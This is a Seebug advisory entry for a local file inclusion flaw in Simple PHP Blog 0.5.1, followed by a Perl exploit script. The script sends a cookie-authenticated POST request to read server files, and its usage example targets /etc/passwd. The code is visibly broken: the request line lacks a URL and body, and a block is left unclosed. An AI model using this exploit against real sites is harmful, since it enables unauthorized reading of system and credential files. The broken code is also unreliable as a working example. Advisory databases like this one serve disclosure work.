Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability

ID SSV:67245
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

                                                # Simple PHP Blog is prone to a local file-include vulnerability because it fails to properly
# sanitize user-supplied input.

#An attacker can exploit this vulnerability to obtain potentially sensitive information or to #execute arbitrary local scripts in the context of the webserver process. This may allow the #attacker to compromise the application and the underlying computer; other attacks are also #possible.

# Simple PHP Blog 0.5.1 is vulnerable; other versions may also be affected. 

# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana <at> isecauditors=dot=com
# Internet Security Auditors

use LWP::UserAgent;

if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
my $res = $ua->request($req);

if ($res->is_success) {
    print $res->content;
} else {
    print "Error: " .$res->status_line, "\n";

#$ perl /blog /etc/passwd <my_cookie_here>|head -1